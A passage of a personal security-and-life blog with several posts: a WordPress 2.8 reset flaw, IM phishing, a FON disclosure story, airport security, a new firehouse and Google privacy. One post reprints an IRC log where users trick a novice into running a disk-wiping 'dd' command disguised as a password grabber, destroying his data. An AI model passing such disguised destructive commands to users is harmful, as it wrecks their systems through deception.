The Firehouse

It appears than an input validation vulnerability is present in wp_login.php, used by Wordpress 2.8.x to validate logins and reset passwords. An attacker can bypass the emailed password change link validation by submitting a crafted input to the password reset function in wp_login.php, as described here. The fix is at the bottom of the article, it involves changing one line of wp_login.php.

I say all this as I just had my password reset through an anonymous proxy, so it appears there is an automated attack taking place – fix your Wordpress today, I just fixed mine!

Last Saturday, while reading through my feeds, I noticed this post on TechCrunch by Duncan Riley, where he tells the story of an attempt by scammers to get his Skype credentials (and wonders why they’d want to do such a thing), much in the same way we’re accustomed to receive emails from PayPal, eBay, and almost any bank on earth. These emails claim there is a problem with your account, and you should ‘confirm your details’ in order to stop said account from being suspended. This will of course do nothing other than give your credentials to these criminals for unhealthy purposes.

Today, a friend that I had not chatted with in some time comes online, and sends me this:

My first thought has been “Uhm, why would Mike send me something like this?”. He’s not prone to even send smilies, always very short and to the point. I go to ask him about it, but I then notice he is in do-not-disturb mode, so I cannot even warn him about the now-obvious scam! It seems that phishers and other scum are realizing people fall for email traps less and less, and are attacking other more trustworthy systems. In this case, the attacker is sending a screensaver, most likely loaded with a trojan. Beware of -any- communication, even from friends, that is unusual in timing, behavior or content. Also, beware about being asked for your IM details, and use strong passwords.

For those of you who are not old enough (or simply don’t know), IRC stands for Internet Relay Chat, and is one of the first real-time, multi-user chat systems that was invented, with capabilities to span multiple servers across countries and continents, servicing thousands of users organized in channels. Daniel Stenberg has a brief overview of IRC history if you want to know a bit more.

Many communities have their dedicated IRC channels where they converse about their topics of interest, and in some cases even offer support for software or services. This is the case of #remote-exploit, registered on Freenode, which serves as a communication and support channel between developers and users of BackTrack, the best and most comprehensive Linux-based Live CD focused on security – this includes auditing, penetration testing, and so on. The IRC channel is frequented by the developers and a few hard-core users, who provide ad-hoc support to other users having difficulties with particular tools, or who may be trying to get something working but failing to do so. Regular chat around security-related topics makes the channel a very nice place to be if you are interested or work in IT security.

There seems to be a trend nowadays, maybe related to how our children are being educated at home and at school, that people simply demand to be spoon-fed particular information to accomplish a very specific task, disregarding the whole process of actually researching, learning and understanding what they are doing. This is particularly important in the security field, as lack of understanding can have very bad consequences, which brings us to today’s episode.

BIG FAT BOLD DISCLAIMERS

• Kids, do not try this at home. Do not try to play either of the sides you see here, chances are you will lose. Particularly, do not run any of the commands you see being used!
• Before you start posting comments about how cruel this was, I agree that things may have gone over the top, but if anyone deserved a lesson, it was this guy. Since there is no such thing as an Internet Supreme Court, we have no place to take these people so they can have their right to use the Internet suspended for two years. This guy was asking for information on how to commit several crimes, and this is something no true hacker will ever condone. He was warned many times that what he was asking was illegal and frowned upon, and he still insisted. All he lost was music and games (by his own admission, the contents of his hard drive) – it was very obvious he wasn’t using his computer for any beneficial purpose at the time, so he would just have to reinstall his games and rip his CDs again, no big deal.
• Hacker does not equate to criminal. A hacker is after knowledge and experimentation, not causing intentional damage. Hackers are analytical and proud of their knowledge, acquired through years of learning and research. Thus, when someone asks for this knowledge to be siphoned off their brains, they get rather miffed, responding as you can see here. If you ask a hacker a sensible question, you will get a sensible answer, as we understand that the same we were taught by others, we have a responsibility to pass on the knowledge – not by spoon-feeding though! An excellent quote found in a DefCon FAQ: ‘Ignorance is forgivable, because it’s curable; stupidity is not… The difference between ignorance and stupidity is in the desire to remain ignorant’.
• This is not a usual event. I have only seen something like this happen twice, and I’ve been on IRC since around 1993. Don’t think that our purpose in life is to sit in IRC channels waiting for victims to prey on.

This particular event took place the evening of April 31st, when someone using the nick JAGGEN (hint: don’t use caps in IRC for either your nick or typing, as it is considered shouting and rude) joined the #remote-exploit IRC channel, and began asking for information on how to perform various illegal acts:

[01:39] * Joins: JEGGAN (n=lechan@81-226-226-68-no58.tbcn.telia.com)
[01:40] <JEGGAN> Hi i am very new att Back Track 2 and wonder if someone want to answere my questions in private... sorry my eng i am swe
[01:47] <JEGGAN> so sad that nobody is here but i will be back tomorrow then
[01:48] <Zi0n> tomorrow we closed
[01:49] <JEGGAN> can u help me Zi0n ?
[01:49] <Zi0n> deppends on the question
[01:50] <JEGGAN> littel random about back track what i can do and not do and so on but i want to take it in privv but i goes good here if u want becus i don't want to spam down the channel whit stupied questions
[01:50] <Zi0n> if you know your question is stupid, why ask it ?
[01:51] <JEGGAN> becus i don't know if it's possibel
[01:51] <JEGGAN> for exampel can i hack irc and take auth's in quakenet whit it?
[01:51] <Zi0n> anyway, ask you question here and see if anyone can help you with it
[01:51] <JEGGAN> ok
[01:51] <JEGGAN> can i hack auth on quakenet whit back track?
[01:52] <JEGGAN> can i hack emails so i can for exampel get my friends msn account and other's account?

Things went downhill from here (click here to read the original log files in text format) – Zi0n told the guy to try in #ubuntu, a channel dedicated to a much better hacker tool collection – of course we all know what Ubuntu really is, and when he joined there he was promptly directed to #ubuntu-offtopic, where he asked the same questions, and was then directed to join #binrev, a hard-core hacker channel on a different IRC server:

[01:59] <FringeJacket> JEGGAN you've got a better chance there
[01:59] <JEGGAN> okok
[01:59] <JEGGAN> let's try then
[02:00] <JEGGAN> uhm in binrev it's nobody there...
[02:00] <kitche> JEGGAN: different server irc.binrev.net is their irc server

Not realizing he was going to make a huge mistake, and having been warned that what he was asking was illegal in at least three different IRC channels, he went on to join #binrev, where the following ensued:

[02:03] * Now talking in #binrev
[02:04] <tehbizz> ok, ask the damn question alrady
[02:10] <JEGGAN> who can i get my friends msn password easy ?
[02:10] <sev> First, learn english.
[02:10] <voltagex> JEGGAN: you can
[02:10] <JEGGAN> how i mean
[02:10] <Strom> JEGGAN: we don't condone that behavior here.
[02:10] <voltagex> ask him for it
[02:11] <sev> That's not the only thing wrong with your question.
[02:11] <JEGGAN> i am new on this and i am swe so i don't have good eng i just want to talk to somebody that can help me a littel bit
[02:11] <voltagex> no.
[02:11] <voltagex> just no.
[02:12] <sev> excellent.
[02:12] <JEGGAN> ?
[02:12] <JEGGAN> so you don't want to help me
[02:12] <Adam> jeggan i know nothing of msn sorry
[02:12] <voltagex> we don't do stealing passwords here
[02:12] <JEGGAN> Adam what do you know about email ?
[02:13] <JEGGAN> voltagex what are you doing here then?
[02:13] <tehbizz> easiest way to get a password: ask for it
[02:13] <tehbizz> discussion over.
[02:13] <sev> JEGGAN: do you know about the amazing hacking powers of 'dd'?
[02:13] <JEGGAN> sev no
[02:13] <voltagex> JEGGAN: not stealing passwords
[02:14] <sev> JEGGAN: I can help you hack with dd.
[02:14] <JEGGAN> sev what is dd?
[02:14] <tehbizz> yes
[02:14] <voltagex> JEGGAN: mad hack tool
[02:14] <sev> it's a remote password grabber
[02:14] <JEGGAN> okok
[02:14] <JEGGAN> where do i get it?
[02:14] <sev> JEGGAN: do you have root access on your machine?
[02:14] <JEGGAN> yes

Now our hapless “hacker” was getting interested…someone is going to teach me how to actually hack, using something called ‘dd’. If you read up Wikipedia’s entry of ‘dd’, you will see that it’s a low-level Unix tool that allows copying data between different media, for example, a floppy disk to a hard drive. It can use a variety of inputs, and write to a variety of outputs. Towards the bottom of the Wikipedia entry, there are some examples of the destructive power of dd, preceeded by this:

As an example, using dd if=/dev/urandom of=/dev/hda will overwrite the hard disk with random data. If this noob had bothered to simply type ‘dd’ in Google, he would have seen the Wikipedia entry as the second result, and taking two minutes to read through it, would have realized that it is not a remote password grabber. Determined to break into other people’s MSN, email and gaming accounts, he charged ahead:

[02:38] <sev> paste this: dd if=/dev/urandom of=/dev/hda # 18.173.134.224/get/hacker/tools/driveb/hack/msn_password_grabber.xof
[02:38] <JEGGAN> where should i put it?
[02:39] <voltagex> in the command line
[02:39] <sev> in your command line, it's all one line, so paste it carefully
[02:39] <JEGGAN> wtf cant puch ctr+c to copy :s
[02:39] <tehbizz> shift+insert
[02:39] <JEGGAN> now it worked

And the inevitable happened, after a few hours of waiting for something to happen while dd was running:

[18:07] <Citrus> try to reboot anyway
[18:07] <JEGGAN> ok
[18:08] <Citrus> you don't loose anything to see if LILO is there already
[18:08] <JEGGAN> should i boot in windows or BT?
[18:08] <Citrus> no, just boot normal without the CD
[18:08] <JEGGAN> ok
[18:08] <Citrus> you should see a menu
[18:08] <JEGGAN> brb
[18:08] * Quits: JEGGAN (~root@81-226-226-68-no58.tbcn.telia.com) (Quit: Leaving)
[18:14] * Joins: JEGGAN (~JEGGAN@81-226-226-68-no58.tbcn.telia.com)
[18:15] <JEGGAN> Citrus,
[18:15] <JEGGAN> no menu and windows dosen't boot
[18:15] <Citrus> what do you mean doesn't boot?
[18:15] <JEGGAN> that i can't go into windows..
[18:16] <Citrus> JEGGAN: what message do you get?
[18:16] <JEGGAN> insert system disk

You can read the whole exchange here, edited to remove irrelevant background chatter. Lessons to be learned from this:

• Don’t be an idiot – if you are told to go search and read, it is very likely that there are numerous sources for answers to your question. If you are told what you want to do is illegal, drop it.
• Don’t believe everything you are told on online (this applies to other means than IRC too!) – would you take advice from a total stranger on the street on how to do brain surgery on yourself? There is no shame in taking your time to double-check advice you are given.
• Learn the basics and work your way up, not the other way around – if you ask to be taught a very high-level and complex topic, without having made the effort to even learn the basics, you will be frowned upon.

Some of you have already heard of the very nasty vulnerability recently discovered in Windows, which allows code injection when the hapless victim simply views an animated cursor on a HTML page or an email message. Microsoft has announced that due to the seriousness of this issue, it will publish an out-of-sync patch as soon as it is ready, i.e. they will not wait for Patch Tuesdayâ„¢. [Update: as I was writing this, I noticed this post which states that patch MS07-017 has been released].

What do you do when you have in your hands the best security distribution in the world? Use it! Here is the result of Mati Aharoni’s (aka Muts) impersonation of The Mexican – click the image to view the full video.

Kids, do not try this at home, and if you are using Windows, well…my sincere condolences. While you are at it, check out the home site for BackTrack.

This is rather funny, be it not because it involves a US congressman, Denny Rehberg of Montana, and his communications director. Apparently, Rehberg was not happy with the grades he got while at Texas Christian University, and thus started to shop around for a hacker that would break into the institution’s systems to upgrade his grades. He contacted none other than attrition.org, where the entire email exchange has been posted. It is a rather fun read if you are a true hacker – not to be confused with a criminal, who are into doing these sort of things – and a warning to clueless politicians.

So, the great news over at TechCrunch today were that Google has added a feature called Mail Fetcher to GMail, which basically allows you to grab email from other services, such as Yahoo.

This sounds great, and it probably is for GMail users, but it is also great for Google. Someone with legal wits should point a browser towards GMail’s terms & services, and check whether there are any provisions to exclude or include, explicitly or not, the scanning of all incoming and outgoing email from these other services. Maybe Google will also scan the contents of the additional email services you add to your GMail account to send you targeted ads. Maybe Google will have even better demographics by tying the IP addresses found in the headers of all the additional emails with their own database of registered users. There is a saying that nobody sells dimes for 9 cents, it’s a rather good saying to move your wallet by.

Any lawyers in the audience?

Airport security is doomed to fail in preventing terrorist attacks. Unless they want us to fly naked and possibly even then get an X-ray and proctologist exam before boarding, there is no way they can prevent nasty things happening.

We are currently forced into placing our toiletries (gels, perfume, shaving cream) into a small clear plastic bag, presumably because the small clear plastic bag will contain the brutal force of a liquid explosive going off inside it. Actually, the explosion would not be that spectacular, as The Register explained.

I happened to travel to London from Barcelona on the 20th, but on flight BA477, the early morning one – had I picked the later flight at 11 AM, BA478, I would have been on one of the aircraft contaminated with Polonium-210. On the way back that afternoon, we flew out of Gatwick, as the Heathrow flight was full…which happened to be BA479, also a contaminated flight. Near-miss on both trips.
Polonium-210 is a highly radioactive substance, but which emits alpha particles, which travel slow and cannot even penetrate the human skin. This makes it very difficult to detect, and since a dose of 1 milligram can kill a human, it is very easy to conceal and transport many lethal doses, for example, inside a pen. Delivery to a victim can be through water or food, inhalation, or an open wound. It’s unlikely a terrorist would start placing little pellets of Polonium in the food trays delivered during a flight, but he could empty one of the sub-100cc bottles he conveniently carried onboard in the clear plastic bag in the lavatory, a place likely visited by most passengers during a long flight.

The next obvious question is – how easy is it to obtain Polonium-210? Very easy, actually. Although it is a byproduct of nuclear reactors, United Nuclear sells license-exempt quantities to the general public. How easy is it to obtain Polonium-210 in toxic quantities? Not that easy – a lot of hype has been passed around the media regarding United Nuclear, but as their special note states, you would need to spend $1 million and order 15.000 samples to have a toxic amount of the stuff. Samples ordered are produced on demand at a reactor in Oak Ridge, Tennessee.

We should not worry too much about getting a whiff of Polonium-210 on our next flight, but we should raise against the draconian “security” measures imposed by panels of would-be experts. We are not realizing that the terrorists are winning one battle, which is to make us live in fear and paranoia, when the actual chances of dying in a terrorist attack are smaller than tripping over on the sidewalk and fatally hitting your head on the concrete. Maybe we should outlaw sidewalks…

You probably remember the post I made regarding FON’s figures, and how much I thought they differed from reality. It got quite a lot of attention, particularly from detractors, and from Martin Varsavsky himself. Many comments were posted on my blog and some others, which pointed towards the fact that I am involved in a startup which supposedly is a clone of FON, and thus I was biased and in no position to comment on FON. To cut a long story short, Martin posted a rather vicious personal attack on his blog, which I answered, he counter-commented, to which I again answered, but he never conceded a bit.

During my investigations that led to the statistics post, I also discovered a serious flaw in the maps management system, which would allow anyone to re-position any FON hotspot and change its address without first logging into the user area.

All that was required was the node’s ID and the hotspot owner’s user ID, both easily obtainable from the public queries that maps.fon.com launches against the database where hotspot data is held, and which I used to gather the statistics. For a determined attacker, it would have been very easy to place every single FON hotspot right in the middle of 1600 Pennsylvania Avenue, Washington DC.

I could have very easily posted about this, but I refrained from doing so for a reason – while I do not work full-time in the IT security industry, I have done quite a bit of consultancy work in the past, related to IT security, particularly in the wireless field. This means that I am fully aware of the industry-approved vulnerability disclosure procedure, which can be explained simply as:

• Document the vulnerability, and inform the company about the fact that you have found it.
• Wait for an initial response, establish contact points, and work a schedule for fixing the issue.
• Work with the company to help them solve the issue.
• Once the issue has been fixed, make a public disclosure on both sides about the vulnerability, giving credit to the person or company that discovered it.

You can find more references to this policy at Microsoft’s Security Response Center, here and here. A PDF from oisafety.org also describes this process in detail. A perfect example on how not to do things is the recent disclosure of a code injection vulnerability, which allowed manipulation of FON’s routers without even having to open them – even though their points are valid, they should have given FON the chance to fix the problem before going public.

In this case, I contacted FON’s support email first September 27th, and received a response on the 29th. This was really generic, only wanting to know about the details, and not acknowledging the normal procedure as I have explained above. On October 2nd, I emailed them again, asking to confirm that they understood the procedure, and on the 3rd they replied that they agreed on following the procedure.

I started compiling the information I had into a working document, but after becoming so frustrated at the attacks received as a result on my post about the statistics, the decision was to simply let the issue go, forget about FON, and concentrate on my own project. A couple of days ago, browsing around for stuff to clean up on the laptop, I came across the half-written report, and decided to finish it and send it to FON support, with CC to Martin, just to close the case. I received a reply today that they have in fact fixed the vulnerability, with a short ‘thanks’ (actually, quoting his email in full: “thanks Mike, i understand its been fixed”) from Martin.

The public acknowledgement of the discovery posted by FON is found in this forum post. Only in the English forums, by a user created apparently for this particular purpose, as this is his first post ever, where it is not likely to draw much attention. This would be fine by me, had not there been the precedent of Martin’s fierce replies to my statistics post, followed by countless attacks by FON’s followers, including an unfortunate incident better left forgotten. What I really cannot understand is that, when I criticize FON, I get such a huge public lashing, whereas when I help them out, I get a three-line remark in a forum where it will go mostly unnoticed. The end result may well be that other vulnerabilities, and it is likely they exist, go unreported.

Whatever the case, this should show those who accused me of unfair, biased attacks on FON that I really just call the shots as I see them, when I smell bullshit, I will point to it, when I see a hole, I will help them fix it – again, IMHO, blogging is not about being or not biased, it is about being ethical and maintaining a set of standards. In my view, it should also prompt Martin to write an apology, but I am not holding my breath. Not that I care much either, what is most important is my work; this is my blog, where I spend part of my spare time, which is not actually that much.

This Christmas, we should be receiving a gift we have been waiting for over 20 years. Our volunteer Fire Department started with a 4-wheel-drive and a cart-mounted 100 gallon water tank, and has since progressed to become the proud owners of two large all-terrain pumpers and one 4-wheel-drive with a small tank & pump for fast response. For the last seven years, we have been housed in a small portion of the basement of the town’s sports hall, sharing the space with many other organizations and groups, including the Police depot. It was simple, very dusty, no showers, toilets, changing or sleeping facilities, and barely space to sit around and be comfortable during a tour.

Before

These are some pictures of what the old house looked like.

The entrance. Bombers in Catalan can be translated as ‘pumpers’, from the word ‘bomba’ which means pump. As a matter of fact, the French call themselves Pompiers, so it ties in. Nothing to do with bombs, believe me!

This is the “control room”. Yeah, stop laughing. It looks real ugly now, as we have not really used the place much in the last two months, as construction work all around it have made it unbearably dusty.

Truck 202 and the 4-wheel, sleeping in a cold, humid and ugly place. The will soon have a much more comfortable stay.

Our mini-museum, showing some glass beer and perfume bottles, recovered from a house fire a few years ago. The heat was intense enough to deform the bottles into the shape you see, but not intense enough to turn them into glass blobs. Underneath are some very old nozzles.

More photos here.

The new firehouse

Here are some pictures of the construction work going on. It is still rough and unfinished, but it definitely has a shape now. All should be done by Christmas, when we will move in and provide the finishing touches.

Truck 202’s new sleeping quarters. In this space we could actually fit two trucks, it’s really amazing that after so many years, we are getting so much room!

This is the view from where the kitchen will be, towards the entrance, on the left. The Flickr photo has some comment notes. The doors on the left lead to the sleeping quarters and changing rooms & showers. We will keep the high ceiling, it makes the place look roomier.

This is a reverse look, towards the kitchen, which will go against the wall at the back.

In all, we are really happy that finally, after many years of only asking for a decent place to stay during tours, in return for our time spent fighting fires, rescuing cats, horses (don’t ask!) and other animals from the most unlikely places, pumping out water during floods, rescuing people and delivering food during heavy snowfalls, we will get a very decent firehouse.

I was reading an article over at The Register, an excellent tech news site (don’t forget to check the BOFH!), that explains a plan by Google to use a microphone connected to your PC to record the ambient sound, extract information about what you are watching on a nearby TV, and then deliver targeted advertising to you based on your selection. I wonder what would they deliver if you are a horror movie fan, or if you are watching Sir David Attenborough’s nature documentaries…but I digress.

In my book, this is plain and simple espionage. There are laws in some countries (also at state level in the U.S.) that govern wiretapping and conversation recording; in some cases, recording as long as you have the consent of one of the parties involved is OK, in others it is just plain illegal. Of course, Google would argue that they do not send the actual sound anywhere, but only a mere derived “signature”. Jim Atkinson’s tscm.com site has some really good information on the subject, as he has been dedicated to hunting down the spies for decades.

All this brings me to a new subject, which is the amount of information that Google may already be collecting about you – personally. Do you have a Gmail account? Do you know about something called Google Analytics? Some of you will have already put two and two toghether (answer is not three). Gmail privacy statement mentions:

Google scans the text of Gmail messages in order to filter spam and detect viruses, just as all major webmail services do. Google also uses this scanning technology to deliver targeted text ads and other related information. This is completely automated and involves no humans.

OK, so they have the contents of every email you send and receive, classified in terms of what sort of things you may buy if they present you with targeted advertising. On the other hand, Google Analytics is a statistics tool widely used by people and companies to track usage of their websites with a great deal of precision. Information collected by Analytics includes the IP addresses of visitors, every action they take, and every navigation path they follow.

Now, combine the two bits of information common to your Gmail account, and somebody.com’s tracking data of your browsing session – the IP address used to send the email, or to browse the site. It can be argued that in many cases, these IP address can be dynamic, or belong to a large organization behind a proxy – but hey, Google is now potentially handling millions of bits of statistical data, so they could eventually learn a great deal about what you do online. Now they only need what you are watching on TV, and your assimilation will be complete. Resistance is futile.

Can anyone say separation of powers? If you are really concerned about your privacy, you probably know what this will do, once placed in your hosts file:

# [Google Inc]
127.0.0.1 www.google-analytics.com
127.0.0.1 ssl.google-analytics.com

If you don’t, then welcome to the era of privacy deprivation..

[Edit: I have changed the post's title, as it looks like the strike tag was causing problems with indexers...sigh]